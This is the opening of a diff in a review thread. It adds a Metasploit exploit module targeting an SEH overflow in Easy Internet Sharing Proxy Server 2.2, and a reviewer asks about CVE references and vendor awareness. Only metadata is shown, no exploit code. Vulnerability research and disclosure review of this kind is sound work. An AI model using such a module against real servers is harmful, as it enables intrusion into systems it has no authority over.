modules/exploits/windows/proxy/easy_internet_sharing_proxy_rop.rb

```diff
@@ -0,0 +1,272 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Easy Internet Sharing Proxy Server 2.2 SEH Overflow',
+      'Description'    => %q{
+        This module exploits a SEH overflow in the Easy Internet Sharing Proxy Socks Server 2.2
+      },
+      'Platform'       => 'win',
+      'Author'         =>
+        [
+          'tracyturben[at]gmail.com'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ %w{URL http://www.sharing-file.com/products.htm}]
```

Comment:
Are there any other references, CVE, EDB?
Is the vendor aware of this vuln, do they have any release notes?